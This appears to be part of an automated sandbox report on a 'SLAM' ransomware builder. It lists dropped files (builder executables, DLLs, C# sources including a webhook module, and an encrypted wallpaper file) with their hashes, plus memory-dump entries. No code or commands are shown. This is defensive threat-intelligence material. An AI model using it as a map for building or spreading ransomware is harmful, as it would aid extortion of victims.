68d0e444c0b27552d2cb86501dcb7db3fd64b82d966e9708db0408ec1ba38c79

SHA512
1d7af604540532a4121850760b1e401bb6356e59503c26f3d1fa358a105b7d88362c92f78aa4394095b165f06c484b8c2d2ed640380e85ef9b3eb087d3e7c869

Download Submit
C:\slam_ransomware_builder\FastColoredTextBox.dll

Filesize
325KB

MD5
adac0cee5cc4de7d4046ae1243e41bf0

SHA1
c8d6d92f0dbee64d0f4c0930f0d2699a8253e891

SHA256
68d0e444c0b27552d2cb86501dcb7db3fd64b82d966e9708db0408ec1ba38c79

SHA512
1d7af604540532a4121850760b1e401bb6356e59503c26f3d1fa358a105b7d88362c92f78aa4394095b165f06c484b8c2d2ed640380e85ef9b3eb087d3e7c869

Download Submit
C:\slam_ransomware_builder\FastColoredTextBox.dll

Filesize
325KB

MD5
adac0cee5cc4de7d4046ae1243e41bf0

SHA1
c8d6d92f0dbee64d0f4c0930f0d2699a8253e891

SHA256
68d0e444c0b27552d2cb86501dcb7db3fd64b82d966e9708db0408ec1ba38c79

SHA512
1d7af604540532a4121850760b1e401bb6356e59503c26f3d1fa358a105b7d88362c92f78aa4394095b165f06c484b8c2d2ed640380e85ef9b3eb087d3e7c869

Download Submit
C:\slam_ransomware_builder\Figgle.dll

Filesize
473KB

MD5
7c89d3e9baf0648fb767a70e0eacc35c

SHA1
6558308ec9d4be79b001c03030401c0e3c9701bc

SHA256
ba6a8965961f80013100f0aa804565edfec035b141cc4484a60b658a1b858dd9

SHA512
00b62dea3d4b4dd60ef307121acf1357e418b3de69b85b8ccb0f74dbb28c357a8dd410020ef325dba5c8bab8c2eac41234686a8e4fdee24063734f3f860ee7d2

Download Submit
C:\slam_ransomware_builder\Figgle.dll

Filesize
473KB

MD5
7c89d3e9baf0648fb767a70e0eacc35c

SHA1
6558308ec9d4be79b001c03030401c0e3c9701bc

SHA256
ba6a8965961f80013100f0aa804565edfec035b141cc4484a60b658a1b858dd9

SHA512
00b62dea3d4b4dd60ef307121acf1357e418b3de69b85b8ccb0f74dbb28c357a8dd410020ef325dba5c8bab8c2eac41234686a8e4fdee24063734f3f860ee7d2

Download Submit
C:\slam_ransomware_builder\Figgle.dll

Filesize
473KB

MD5
7c89d3e9baf0648fb767a70e0eacc35c

SHA1
6558308ec9d4be79b001c03030401c0e3c9701bc

SHA256
ba6a8965961f80013100f0aa804565edfec035b141cc4484a60b658a1b858dd9

SHA512
00b62dea3d4b4dd60ef307121acf1357e418b3de69b85b8ccb0f74dbb28c357a8dd410020ef325dba5c8bab8c2eac41234686a8e4fdee24063734f3f860ee7d2

Download Submit
C:\slam_ransomware_builder\MSBuild.exe

Filesize
256KB

MD5
8fdf47e0ff70c40ed3a17014aeea4232

SHA1
e6256a0159688f0560b015da4d967f41cbf8c9bd

SHA256
ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82

SHA512
bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

Download Submit
C:\slam_ransomware_builder\MSBuild.exe

Filesize
256KB

MD5
8fdf47e0ff70c40ed3a17014aeea4232

SHA1
e6256a0159688f0560b015da4d967f41cbf8c9bd

SHA256
ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82

SHA512
bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

Download Submit
C:\slam_ransomware_builder\fonts\big.flf

Filesize
28KB

MD5
53d797b00ba6bb56ba3c804afedabc2f

SHA1
9cccecd73d7767aef0f83ebbe8efb097cde612e2

SHA256
931beae4b5b7a6a0fff63a6a0b80a974f94bd7e723a3a506bebb45095dc384a1

SHA512
aa7d91210e653d807898fe385e018353e4602666171c77b5f2c12e7b5aaf98f62809401c0165372dd7b41a80c6f1f13df6072c245b6b2340a30215425c0c5d32

Download Submit
C:\slam_ransomware_builder\slam ransomware builder.exe

Filesize
1.6MB

MD5
04096ebe5f1da9430a6c98aceb4ca99a

SHA1
40a0a027eda6ebb90a51a42685fed896f686c728

SHA256
845a571de434a4f73b71ff0e6d50521095bf1da5d51d3d0d8397d07d374af3b2

SHA512
44ce2c37074a7ef495ff9f906bd81ea1f13a5640d3af1020c9b5e449515d31c210f7e8a41d896de47c3b4dbfe50301ac5482886c9f383a66abb5f541c5695da8

Download Submit
C:\slam_ransomware_builder\slam.exe

Filesize
1.6MB

MD5
04096ebe5f1da9430a6c98aceb4ca99a

SHA1
40a0a027eda6ebb90a51a42685fed896f686c728

SHA256
845a571de434a4f73b71ff0e6d50521095bf1da5d51d3d0d8397d07d374af3b2

SHA512
44ce2c37074a7ef495ff9f906bd81ea1f13a5640d3af1020c9b5e449515d31c210f7e8a41d896de47c3b4dbfe50301ac5482886c9f383a66abb5f541c5695da8

Download Submit
C:\slam_ransomware_builder\start.exe

Filesize
46KB

MD5
f7b1a64333ab633f980b702723fb7cba

SHA1
e7e04a69a84c5a9e7d0901eb00face35457a0df1

SHA256
e7bde6768de9a7a1b1028d7fa52548f8c074b7355820b7a1cb2d4c2c082512d2

SHA512
666d09200f0bc1762903fcfb748335d1fec27cf2cd9723a91d2ad870468b94236ad7c15ed453446accc415f0be5d40f006d57695204fd7fa30c676a8e6d2ecad

Download Submit
C:\slam_ransomware_builder\start.exe

Filesize
46KB

MD5
f7b1a64333ab633f980b702723fb7cba

SHA1
e7e04a69a84c5a9e7d0901eb00face35457a0df1

SHA256
e7bde6768de9a7a1b1028d7fa52548f8c074b7355820b7a1cb2d4c2c082512d2

SHA512
666d09200f0bc1762903fcfb748335d1fec27cf2cd9723a91d2ad870468b94236ad7c15ed453446accc415f0be5d40f006d57695204fd7fa30c676a8e6d2ecad

Download Submit
C:\slam_ransomware_builder\uac\ConsoleApp2\1.ico

Filesize
66KB

MD5
889e8ff9455bb4837f91ff644dcf2b82

SHA1
6bc850368a6444885e59d368ab5774cedb6792e2

SHA256
56ee941f7f4fcf1e050be3544ad73cfe7a061f288a3af4960632b0fcced94d51

SHA512
771af6b48883b408d45c952380ede6ab466efb776360af6bda5c0530332876d62b127803e4e4cef7e68dc64f829603cb939dbdc2d8cafe3d08dc954b796f2fa4

Download Submit
C:\slam_ransomware_builder\uac\ConsoleApp2\Properties\AssemblyInfo.cs

Filesize
556B

MD5
a08e9477bcf35558054417f16a5f5617

SHA1
5853ada9553643a039b1b56324f0c95226179c44

SHA256
7ef40c0cf01ec60f42ace3924716f5ccef0f5eea84bd8f9006016ddbfcdf36d2

SHA512
2f7950f9462fb26dfbd133311f2c0403929eef6c75abe416d55ca8e88dceaef15021e294c3ea683d221ae22ba7acac33c63d80d441adf28fa8ffd67a577b11b2

Download Submit
C:\slam_ransomware_builder\wallpaper.jpg.SLAM

Filesize
122KB

MD5
f83cd0592ef46ff26c4b81f3ebbeec1c

SHA1
9a99d054675e7fa659188e1057a271b4b59c6e78

SHA256
2c070169ac950517fd5e828e309fb0e27ad24cfc94dfbc2c3de5f6a9adbc8d7b

SHA512
6c3576a275fb7da04c982682999ebaed346af757e88f2b5d12cc1ecaf3bb9639a458a2e207f69d5fa04dd03272e831d1c07e0a7c46beb28c2a51ef93425b2df9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs

Filesize
194B

MD5
60e83364aba7437f89860f4fed9b0ca6

SHA1
a346530400ddfb4e709aac20d1201ce2047adae5

SHA256
0c2eadb59d40b199250a3c2e0c3119180c9f0c00e069bf51bb7bb39c9b2eeefb

SHA512
295f9ecd2034cc9cc6c23375f0827decc382d2fec17848e210261edd6561ef7ac5737f7ace00b981885c500ffa31f61a69e620bc9312cb27fd9718aab30be591

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tmp467580e5049248b885ff8164387c1736.rsp

Filesize
2KB

MD5
084b15ba76ccc049427f797e87f1d4b5

SHA1
36bbe125b2c52f4c530113e75847e30f8e48cae6

SHA256
bc92718bfbe5317d76cb52030c8793c7a457e5a6bc5eb7e5b44725c352f30d39

SHA512
5e8024d57cea611ec235bee73daa7942c5a209273041529824e96b903b2ea0ea4938ae63954b9732525d7d3d7f705823dae31c46e91ca464a2a934af440db9b7

Download Submit
\??\c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\CenterScreen.cs

Filesize
1KB

MD5
f031292fd99d65f3a9f2bc533bd90014

SHA1
65b8a430785cf82853d347ffd8619b268a7f84c4

SHA256
f7b7df68d57eaa80fdeb055c522eaa47a6f41d962e1e3a50343ea36fda3bd80f

SHA512
7357dfe0f5a9536a926e87cdc860e06eaa724e518e65ce9e33d265e69ff5b82eb8d42b759df32a83052f453ed623c1481c8ff06075b19d24f56394f54e3b8948

Download Submit
\??\c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Program.cs

Filesize
59KB

MD5
b01fd2c1c16e37efe7dc53dda5d756fc

SHA1
9d89a6c55cf910c8ad2e6f892cc9d6837522403b

SHA256
f14d6eba871730839de178f6bc09d0464c5009f5eea90e6266e1ce72d3c84b34

SHA512
d286a930c89f9b4ca9e4e324add9da7ce5bc6166e1cdfac6e316ab3e4b1c50461506f1addf9d1c736733a32fae5f5db2b0fa3feac3c3dace36537dee05a9a86d

Download Submit
\??\c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Properties\AssemblyInfo.cs

Filesize
569B

MD5
6ae5c2395170e2d6d29d4f1e95e676e6

SHA1
533905ab44c6c68b58212f62202549646e23f2f6

SHA256
c12e04bcf0c4bd14dcbb50cc96416c77080ffc4bac7fb784d462ee6d6d163d6f

SHA512
492b0f4e8d4783194438f6be9d432bc008b7d72a31dbaf9aca5714e276ee13f8310408f379f165ec4ac63eb59404899c772f471a48a785ad8fd79c1cd9bfc80e

Download Submit
\??\c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Properties\Resources.Designer.cs

Filesize
3KB

MD5
a18c2165eca83b60b14010fddb2dab12

SHA1
99f56e0e02b2f12d2ba96380b8410977cec61a42

SHA256
aebf224697035142a1448fb6653cf3c85fb23fa92713ff6bc84c65bbc187040d

SHA512
58aadd355a0f89f6657acab51ac3dcb76ad037dcd05d7df375fc8f71981f02e9d7aff62b808ce26ba92f863df16099eefe722cda066aba2d03438270fcb55f48

Download Submit
\??\c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\app.manifest

Filesize
3KB

MD5
cfa9d8c65a7c96a49d8c8827eec7aa3e

SHA1
27a9cf5aadce36306bf1227d24c96207224eb972

SHA256
2caf5b3663099e56e4ece8992249e628f5bfbd32fbc963c251e850d5c14a010b

SHA512
668b5e70caf3a52d3ac4647e57f303ff9bc29d85041c243cd3e1ed7d093a7571da7d77ea6bae83b72893c2766416efaad8ecd0eddc0c5df4487d6d9ff7e043d3

Download Submit
\??\c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\ConsoleApp2.Properties.Resources.resources

Filesize
808KB

MD5
378136d9777c72b6c531d3a7cda5c688

SHA1
b943b607390e7d0c353578282dff8687655b7392

SHA256
6696cf2238e0ff986be0d6549904de0855f71ab7ec53c1c639be2f97e9075755

SHA512
01604471437753150a757b62690385c1cf8636d73e7959a18dab5cb60ba87a61f92536b63922b31b226b034d233f3980b47649bbbd9405b175ed09f304d5c683

Download Submit
\??\c:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\webhook.cs

Filesize
3KB

MD5
48328b99df8af9ae9f83f4eedda844c2

SHA1
7522860dacea9e8716c2dacfc8866f22abc23b5a

SHA256
67e69dd78f613b9775dbb1f7320e11a39f6bf7dae79d006a28ac5d5c91cef6f9

SHA512
137f27ee94332087ed02a884e623fa7a176cf78d16c3e93c77bc8cbba82aa3b949fab0d6201f78937eee922d3f0d0bc34ce9cc70aa61935c7b44415f8ca7e695

Download Submit
memory/728-236-0x00000000064A0000-0x0000000006806000-memory.dmp

Filesize
3.4MB

Download
memory/728-237-0x0000000005910000-0x0000000005938000-memory.dmp

Filesize
160KB

Download
memory/728-239-0x0000000006130000-0x00000000061A6000-memory.dmp

Filesize
472KB

Download
memory/728-234-0x00000000060A0000-0x0000000006150000-memory.dmp

Filesize
704KB

Download
memory/728-241-0x000000000695C000-0x0000000006B5E000-memory.dmp

Filesize
2.0MB

Download
memory/728-243-0x0000000005910000-0x0000000005940000-memory.dmp

Filesize
192KB

Download
memory/728-222-0x00000000050B0000-0x00000000050CA000-memory.dmp

Filesize
104KB

Download
memory/728-230-0x0000000006550000-0x0000000006ABC000-memory.dmp

Filesize
5.4MB

Download
memory/728-223-0x0000000005270000-0x00000000053CA000-memory.dmp

Filesize
1.4MB

Download
memory/728-227-0x0000000005D90000-0x0000000005DD4000-memory.dmp

Filesize
272KB

Download
memory/728-221-0x00000000008F0000-0x0000000000930000-memory.dmp

Filesize
256KB

Download
memory/728-244-0x00000000063C0000-0x0000000006646000-memory.dmp

Filesize
2.5MB

Download
memory/728-245-0x00000000062B0000-0x000000000642C000-memory.dmp

Filesize
1.5MB

Download
memory/728-235-0x0000000006730000-0x0000000006D2E000-memory.dmp

Filesize
6.0MB

Download
memory/728-226-0x0000000005E50000-0x0000000005F72000-memory.dmp

Filesize
1.1MB

Download
memory/728-238-0x0000000005900000-0x0000000005912000-memory.dmp

Filesize
72KB

Download
memory/728-224-0x00000000051A0000-0x00000000051D0000-memory.dmp

Filesize
192KB

Download
memory/1964-299-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/1964-301-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/2032-298-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/2032-295-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/2032-302-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/2032-294-0x0000000000590000-0x000000000059A000-memory.dmp

Filesize
40KB

Download
memory/3244-212-0x0000000009CA0000-0x0000000009D1C000-memory.dmp

Filesize
496KB

Download
memory/3244-208-0x00000000094B0000-0x0000000009508000-memory.dmp

Filesize
352KB

Download
memory/3244-198-0x0000000008F50000-0x0000000008FB6000-memory.dmp

Filesize
408KB

Download
memory/3244-197-0x0000000008600000-0x000000000869C000-memory.dmp

Filesize
624KB

Download
memory/3244-196-0x00000000003B0000-0x0000000000550000-memory.dmp

Filesize
1.6MB

Download
memory/3440-316-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/3440-315-0x0000000000150000-0x000000000015A000-memory.dmp

Filesize
40KB

Download
memory/3440-319-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/3532-296-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/3532-297-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/3984-309-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/3984-310-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/4000-304-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/4000-307-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/4448-273-0x0000000000900000-0x00000000009EC000-memory.dmp

Filesize
944KB

Download
memory/4824-303-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/4824-300-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/4992-308-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/5056-133-0x00007FF8F3590000-0x00007FF8F4051000-memory.dmp

Filesize
10.8MB

Download
memory/5056-135-0x00007FF8F3590000-0x00007FF8F4051000-memory.dmp

Filesize
10.8MB

Download
memory/5056-132-0x00000175E3470000-0x00000175E3492000-memory.dmp

Filesize
136KB

Download
memory/5288-314-0x0000000000AE0000-0x0000000000BCC000-memory.dmp

Filesize
944KB

Download
memory/5560-317-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/5560-318-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/5760-305-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/5760-306-0x00007FF8EEE60000-0x00007FF8EF921000-memory.dmp

Filesize
10.8MB

Download
memory/5984-180-0x0000000007150000-0x00000000071E2000-memory.dmp

Filesize
584KB

Download
memory/5984-181-0x00000000071F0000-0x00000000071FA000-memory.dmp

Filesize
40KB

Download
memory/5984-182-0x000000000B620000-0x000000000B62A000-memory.dmp

Filesize
40KB

Download
memory/5984-185-0x000000000BFA0000-0x000000000BFB2000-memory.dmp

Filesize
72KB

Download
memory/5984-179-0x0000000007840000-0x0000000007DE4000-memory.dmp

Filesize
5.6MB

Download
memory/5984-178-0x0000000000190000-0x00000000028D4000-memory.dmp

Filesize
39.3MB

Download